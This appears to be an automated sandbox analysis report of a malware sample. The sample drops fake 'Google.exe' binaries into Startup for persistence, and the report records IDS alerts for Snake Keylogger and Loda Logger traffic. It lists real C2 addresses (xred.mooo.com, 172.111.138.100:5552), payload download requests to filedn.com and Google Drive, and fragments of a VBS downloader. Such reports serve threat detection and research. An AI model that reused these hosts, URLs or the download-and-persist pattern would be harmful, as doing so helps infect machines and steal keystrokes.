                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49778 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49779 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49782 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49783 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49791 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49792 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51918 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51919 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:51929 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:51931 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51944 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51943 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51951 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51953 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51975 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51978 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51985 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51986 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51997 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51998 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52009 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52008 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52032 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52034 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52044 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52045 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52078 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52077 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52088 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52089 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52109 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52108 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:52116 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:52120 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52134 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52139 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52160 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52164 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:52163 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52187 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52187 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52188 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52196 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52200 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52219 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:52222 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:52220 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52221 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52229 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52228 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:52230 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:52232 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52242 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52239 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52287 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52288 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52299 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52302 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52311 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52312 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52322 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52323 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52335 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52334 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52339 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52340 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52344 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52346 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52348 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52350 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52358 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52357 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52366 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52368 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52374 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52372 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52381 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52382 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52386 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52387 version: TLS 1.2
                            Source: wscript.exe, 00000000.00000003.1726551939.00000231A0520000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                            Source: wscript.exe, 00000000.00000003.1726551939.00000231A0520000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                            Source: wscript.exe, 00000000.00000003.1726551939.00000231A0520000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                            Source: wscript.exe, 00000000.00000003.1724371343.00000231A0A93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                            Source: wscript.exe, 00000000.00000003.1724371343.00000231A0A93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                            Source: wscript.exe, 00000000.00000003.1724371343.00000231A0A93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                            Source: wscript.exe, 00000000.00000003.1723583214.00000231A0826000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                            Source: wscript.exe, 00000000.00000003.1723583214.00000231A0826000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                            Source: wscript.exe, 00000000.00000003.1723583214.00000231A0826000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                            Source: Google.exe, 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                            Source: Google.exe, 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                            Source: Google.exe, 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0091DD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_0091DD92
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00952044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00952044
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0095219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0095219F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_009524A9
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00946B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00946B3F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00946E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00946E4A
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0094F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0094F350
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0094FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0094FDD2
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0094FD47 FindFirstFileW,FindClose,2_2_0094FD47
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008F2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_008F2044
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008F219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_008F219F
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008F24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_008F24A9
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008E6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,11_2_008E6B3F
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008E6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,11_2_008E6E4A
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008EF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_008EF350
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008BDD92 GetFileAttributesW,FindFirstFileW,FindClose,11_2_008BDD92
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008EFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_008EFDD2
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008EFD47 FindFirstFileW,FindClose,11_2_008EFD47
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00292044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_00292044
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0029219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_0029219F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_002924A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_002924A9
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00286B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,27_2_00286B3F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00286E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,27_2_00286E4A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0028F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_0028F350
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0028FD47 FindFirstFileW,FindClose,27_2_0028FD47
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0025DD92 GetFileAttributesW,FindFirstFileW,FindClose,27_2_0025DD92
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0028FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,27_2_0028FDD2
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: excel.exeMemory has grown: Private usage: 1MB later: 73MB

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:49753 -> 172.111.138.100:5552
                            Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.4:49740 -> 69.42.215.252:80
                            Source: Network trafficSuricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.4:49753
                            Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.4:49776 -> 69.42.215.252:80
                            Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.4:51926 -> 69.42.215.252:80
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49741 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49737 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49742 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49736 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49756 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49748 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49755 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49747 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49779 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49763 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49770 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49768 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49778 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49791 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49792 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49783 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49787 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49762 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49788 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49774 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49782 -> 142.250.185.206:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49772 -> 142.250.185.206:443
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\System32\wscript.exeNetwork Connect: 23.109.93.100 443Jump to behavior
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: xred.mooo.com
                            Potential malicious VBS script found (has network functionality)
                            Source: Initial file: .write mrWIFyTQ.responseBody
                            Source: Initial file: .savetofile FileName , 2
                            Uses dynamic DNS services
                            Source: unknownDNS query: name: freedns.afraid.org
                            Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                            Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                            Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                            Source: global trafficHTTP traffic detected: GET /lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exe HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: filedn.comConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0095550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_0095550C
                            Source: global trafficHTTP traffic detected: GET /lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exe HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: filedn.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
